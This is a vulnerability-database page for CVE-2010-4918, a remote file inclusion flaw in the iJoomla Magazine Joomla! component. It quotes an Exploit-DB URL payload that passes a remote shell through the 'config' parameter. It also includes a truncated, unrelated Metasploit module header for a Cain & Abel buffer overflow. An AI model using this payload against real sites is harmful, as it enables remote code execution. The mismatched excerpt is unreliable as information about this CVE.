CVE-2010-4918
published 2011-10-08CVE-2010-4918: PHP remote file inclusion vulnerability in iJoomla Magazine (com_magazine) component 3.0.1 for Joomla! allows remote attackers to execute arbitrary PHP code…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.40%
82.0th percentile
PHP remote file inclusion vulnerability in iJoomla Magazine (com_magazine) component 3.0.1 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the config parameter to magazine.functions.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ijoomla | com_magazine | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2008-5405 Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
---
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cain & Abel %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek ' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '20
Exploit-DB
Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion
exploitdb·2010-09-05
CVE-2010-4918 Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion
Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion
---
# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ]
# Date: [5-9-2010]
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/]
# Version: [v 3.0.1 ]
# Tested on: [Windows XP]
# CVE : Hacker town of Musayyib
# Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ [email protected]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
Greetings: No
No writeups or analysis indexed.
http://packetstormsecurity.org/1009-exploits/ijoomlamagazine-rfi.txthttp://securityreason.com/securityalert/8451http://www.exploit-db.com/exploits/14896https://exchange.xforce.ibmcloud.com/vulnerabilities/61598http://packetstormsecurity.org/1009-exploits/ijoomlamagazine-rfi.txthttp://securityreason.com/securityalert/8451http://www.exploit-db.com/exploits/14896https://exchange.xforce.ibmcloud.com/vulnerabilities/61598
2011-10-08
Published